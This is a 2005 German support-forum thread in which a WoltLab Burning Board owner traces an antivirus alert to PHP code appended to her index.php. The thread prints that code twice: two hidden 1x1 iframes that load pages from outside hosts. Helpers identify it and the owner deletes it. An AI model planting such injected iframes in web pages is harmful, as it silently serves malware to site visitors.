YourWBB


yourWBB » WoltLab Burning Board Generation 2 * » Alles von und für das WBB 2.3.x » [WBB 2.3.x] Allg. Fragen und Probleme » Trojanisches Pferd bei Anwahl meines Boards » Hallo Gast [Anmelden|Registrieren]
Letzter Beitrag | Erster ungelesener Beitrag 2.453 Views | | Thema zu Favoriten hinzufügen

Neues Thema erstellen Antwort erstellen

Dieses Thema wurde als unerledigt markiert. Thread unerledigt

Zum Ende der Seite springen Trojanisches Pferd bei Anwahl meines Boards
Autor
Beitrag « Vorheriges Thema | Nächstes Thema »
Hamsterli Hamsterli ist weiblich
Mitglied


images/avatars/avatar-1291.gif

Dabei seit: 30.01.04
Beiträge: 30
Herkunft: Kölle
Forenversion: 2.3.3

 Trojanisches Pferd bei Anwahl meines Boards Antworten Zitieren Editieren Melden       UP

Problembeschreibung: Hilfe, ich habe ein Trojanisches Pferd in meinem Forumsverzeichnis. Ich bin jetzt auf der Arbeit und komme nicht an meinen Server heran. Was kann ich tun?


Fehlermeldung: Sobald die index.php angewählt wird, erscheint die Meldung des Virusscanner. Erkannt als JS/Wonka. Als Name nennt der Virusscanner index.htm aber so eine Datei habe ich nicht in meinem Boardverzeichnis.


Was wurde zuletzt geändert oder eingebaut? habe heute morgen die style-datei wieder neu aufgespielt, weil ich bei dem header-template die navileiste "zerstört" hatte.

HILFE. Der verzweifelte Hamster

__________________


Auf der Schachtel stand: 'Benötigt Windows 95 oder besser', darum habe ich mir einen Macintosh gekauft.

16.11.05 13:24 Hamsterli ist offline E-Mail Finden Als Freund hinzufügen AIM-Name von Hamsterli: Hamsterli27 YIM-Name von Hamsterli: Hamsterli27
Polarist2k
Mitglied


images/avatars/avatar-3999.gif

Dabei seit: 26.11.04
Beiträge: 1.132
Forenversion: Lite - 2.3.3

 RE: Trojanisches Pferd bei Anwahl meines Boards Antworten Zitieren Editieren Melden       UP

URL zum Board?

Ansonsten: Haste ein BackUp, wo noch alles virenfrei war?!

__________________
Greetz, Polarist

16.11.05 13:31 Polarist2k ist offline E-Mail WWW Finden Als Freund hinzufügen
Hamsterli Hamsterli ist weiblich
Mitglied


images/avatars/avatar-1291.gif

Dabei seit: 30.01.04
Beiträge: 30
Herkunft: Kölle
Forenversion: 2.3.3

Themenstarter Thema begonnen von Hamsterli
Antworten Zitieren Editieren Melden       UP

ich nicht, aber sicher mein Webspace-Anbieter

__________________


Auf der Schachtel stand: 'Benötigt Windows 95 oder besser', darum habe ich mir einen Macintosh gekauft.

Dieser Beitrag wurde 3 mal editiert, zum letzten Mal von Hamsterli: 17.11.05 09:42.

16.11.05 14:19 Hamsterli ist offline E-Mail Finden Als Freund hinzufügen AIM-Name von Hamsterli: Hamsterli27 YIM-Name von Hamsterli: Hamsterli27
SessionX SessionX ist männlich
vBulletin Junky


Dabei seit: 31.05.04
Beiträge: 2.895
Fähigkeiten: WBB3 Anfänger; WBB Lite 2 Fortgeschritten; WBB Lite 1 Fortgeschritten
Herkunft: Wolfsburg
Forenversion: 3.0

Antworten Zitieren Editieren Melden       UP

naja wenn du nen Trojaner auf dem Server haben solltest dann viel Spaß Zunge raus

Hast keine Viren Software auf dem Server drauf ?

__________________
31.05.2004 - 31.05.2008 = 4 Jahre y******
geschockt
und immer noch in den Top10 der y****** Spammer.
fröhlich
iPhone 3G Rocker
16.11.05 14:54 SessionX ist offline E-Mail WWW Finden Als Freund hinzufügen Füge SessionX in deine Kontaktliste ein
Hamsterli Hamsterli ist weiblich
Mitglied


images/avatars/avatar-1291.gif

Dabei seit: 30.01.04
Beiträge: 30
Herkunft: Kölle
Forenversion: 2.3.3

Themenstarter Thema begonnen von Hamsterli
Antworten Zitieren Editieren Melden       UP

ich hab einfach nur ein Webspace-Paket: Eigentlich geh ich davon aus, dass sowas installiert ist Versagt

__________________


Auf der Schachtel stand: 'Benötigt Windows 95 oder besser', darum habe ich mir einen Macintosh gekauft.

16.11.05 16:46 Hamsterli ist offline E-Mail Finden Als Freund hinzufügen AIM-Name von Hamsterli: Hamsterli27 YIM-Name von Hamsterli: Hamsterli27
KleenMicha KleenMicha ist männlich
Webentwickler


images/avatars/avatar-5745.jpg

Dabei seit: 16.01.04
Beiträge: 2.592
Fähigkeiten: WBB3 Fortgeschritten; WBB2 Profi

Antworten Zitieren Editieren Melden       UP

Zitat:
Original von Poetschke
naja wenn du nen Trojaner auf dem Server haben solltest dann viel Spaß Zunge raus

Hast keine Viren Software auf dem Server drauf ?


mal wieder ein großartiger Beitrag. Augen rollen

Zum eigentlichen Problem der Vrius verbreitet sich über javascript daher die Frage hast du in deiner Seite zufällig javascript Codes eingebaut außer den vom wbb original?

Bzw hast du per iframe vlt eine andere Seite bei dir eingebunden?

__________________
Gruß Micha
16.11.05 20:35 KleenMicha ist offline E-Mail WWW Finden Als Freund hinzufügen Füge KleenMicha in deine Kontaktliste ein MSN Passport-Profil von KleenMicha anzeigen
Hamsterli Hamsterli ist weiblich
Mitglied


images/avatars/avatar-1291.gif

Dabei seit: 30.01.04
Beiträge: 30
Herkunft: Kölle
Forenversion: 2.3.3

Themenstarter Thema begonnen von Hamsterli
Antworten Zitieren Editieren Melden       UP

Auf der Homepage ja, einen Java-Chat zB, aber nicht im Forum. Da ist nichts eingebaut, außer der Style. Die Meldung kommt ja auch nur, wenn man das Forum anwählt, aber nicht, wenn man die Page oder irgendwelche Unterseiten ansurft.

edit: 23:31 hab mir gerade mal ie index.php angeschaut... ganz unten habe ich das gefunden...

code:
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
	}

}

eval("\$tpl->output(\"".$tpl->get("index")."\");");

?>
<?

echo '<iframe src="http://iframebiz.biz/dl/adv443.php" width=1 height=1></iframe>';

echo '<iframe src="http://www.wakayama-info.net/board/includes/top/9094/index.html" width=1 height=1></iframe>';

?>


könnte es das sein??? woher kommt das?

__________________


Auf der Schachtel stand: 'Benötigt Windows 95 oder besser', darum habe ich mir einen Macintosh gekauft.

Dieser Beitrag wurde 3 mal editiert, zum letzten Mal von Hamsterli: 16.11.05 23:29.

16.11.05 22:23 Hamsterli ist offline E-Mail Finden Als Freund hinzufügen AIM-Name von Hamsterli: Hamsterli27 YIM-Name von Hamsterli: Hamsterli27
Polarist2k
Mitglied


images/avatars/avatar-3999.gif

Dabei seit: 26.11.04
Beiträge: 1.132
Forenversion: Lite - 2.3.3

Antworten Zitieren Editieren Melden       UP

Lösch mal den untersten Teil

code:
1:
2:
3:
4:
5:
6:
7:
<?

echo '<iframe src="http://iframebiz.biz/dl/adv443.php" width=1 height=1></iframe>';

echo '<iframe src="http://www.wakayama-info.net/board/includes/top/9094/index.html" width=1 height=1></iframe>';

?>


raus ...

Weil ich nehme mal an, dass es daran liegt, insbesondere am zweiten Teil, wenn du sagst, dass die Trojanermeldung von ner index.html herrührt ...

__________________
Greetz, Polarist

16.11.05 23:50 Polarist2k ist offline E-Mail WWW Finden Als Freund hinzufügen
Hamsterli Hamsterli ist weiblich
Mitglied


images/avatars/avatar-1291.gif

Dabei seit: 30.01.04
Beiträge: 30
Herkunft: Kölle
Forenversion: 2.3.3

Themenstarter Thema begonnen von Hamsterli
Antworten Zitieren Editieren Melden       UP

Prost es scheint das tatsächlich gewesen zu sein! Vielen Dank an alle für die schnelle Hilfe!!! Ehren Ehren Ehren Knutsch

bin ich ja mal froh, dass der gaul nicht auf dem server hängt.

__________________


Auf der Schachtel stand: 'Benötigt Windows 95 oder besser', darum habe ich mir einen Macintosh gekauft.

Dieser Beitrag wurde 1 mal editiert, zum letzten Mal von Hamsterli: 17.11.05 00:00.

16.11.05 23:59 Hamsterli ist offline E-Mail Finden Als Freund hinzufügen AIM-Name von Hamsterli: Hamsterli27 YIM-Name von Hamsterli: Hamsterli27
American American ist männlich
Mitglied


images/avatars/avatar-2920.gif

Dabei seit: 16.06.04
Beiträge: 726
Fähigkeiten: WBB2 Fortgeschritten
Herkunft: Aus der Luft
Forenversion: 2.3

Antworten Zitieren Editieren Melden       UP

Zitat:
Original von Hamsterli
woher kommt das?


Du, oder einer, der Zugang zum Server hat, wird es eingebaut haben Augenzwinkern

__________________
Das Leben ist ein Geschenk, aber keiner hat mich gefragt, ob ich das Geschenk haben will.
Wenn dich einer fragt, ob du es haben willst, dann nimm es, fang von Vorne an und mach was draus.

Er ist Guter Junge - Sie ist böses Mädchen

Männer sind Schweine - Frauen aber auch

17.11.05 00:07 American ist offline E-Mail Finden Als Freund hinzufügen Füge American in deine Kontaktliste ein AIM-Name von American: Weisskopfadler84 YIM-Name von American: Thorsten0784 MSN Passport-Profil von American anzeigen
Hamsterli Hamsterli ist weiblich
Mitglied


images/avatars/avatar-1291.gif

Dabei seit: 30.01.04
Beiträge: 30
Herkunft: Kölle
Forenversion: 2.3.3

Themenstarter Thema begonnen von Hamsterli
Antworten Zitieren Editieren Melden       UP

ich wars nicht, und die leute, die offiziell zugriff haben auch nicht. kann das ja nur inoffiziell gewesen sein.

Und durch das hochladen des styles gestern morgen kann es nicht sein? Ist nämlich danach direkt aufgetreten.

__________________


Auf der Schachtel stand: 'Benötigt Windows 95 oder besser', darum habe ich mir einen Macintosh gekauft.

17.11.05 09:42 Hamsterli ist offline E-Mail Finden Als Freund hinzufügen AIM-Name von Hamsterli: Hamsterli27 YIM-Name von Hamsterli: Hamsterli27
American American ist männlich
Mitglied


images/avatars/avatar-2920.gif

Dabei seit: 16.06.04
Beiträge: 726
Fähigkeiten: WBB2 Fortgeschritten
Herkunft: Aus der Luft
Forenversion: 2.3

Antworten Zitieren Editieren Melden       UP

Da du das in der index.php gefunden hast, wird es nicht am Style liegen, oder hast du dabei die index.php ausgetauscht?

__________________
Das Leben ist ein Geschenk, aber keiner hat mich gefragt, ob ich das Geschenk haben will.
Wenn dich einer fragt, ob du es haben willst, dann nimm es, fang von Vorne an und mach was draus.

Er ist Guter Junge - Sie ist böses Mädchen

Männer sind Schweine - Frauen aber auch

17.11.05 11:09 American ist offline E-Mail Finden Als Freund hinzufügen Füge American in deine Kontaktliste ein AIM-Name von American: Weisskopfadler84 YIM-Name von American: Thorsten0784 MSN Passport-Profil von American anzeigen
Hamsterli Hamsterli ist weiblich
Mitglied


images/avatars/avatar-1291.gif

Dabei seit: 30.01.04
Beiträge: 30
Herkunft: Kölle
Forenversion: 2.3.3

Themenstarter Thema begonnen von Hamsterli
Antworten Zitieren Editieren Melden       UP

jup, hast recht. Vielen Dank. Dann muss ich mir wohl mal bißl sorgen machen.

__________________


Auf der Schachtel stand: 'Benötigt Windows 95 oder besser', darum habe ich mir einen Macintosh gekauft.

17.11.05 11:18 Hamsterli ist offline E-Mail Finden Als Freund hinzufügen AIM-Name von Hamsterli: Hamsterli27 YIM-Name von Hamsterli: Hamsterli27
Baumstruktur | Brettstruktur
Gehe zu:

Neues Thema erstellen Antwort erstellen

yourWBB » WoltLab Burning Board Generation 2 * » Alles von und für das WBB 2.3.x » [WBB 2.3.x] Allg. Fragen und Probleme » Trojanisches Pferd bei Anwahl meines Boards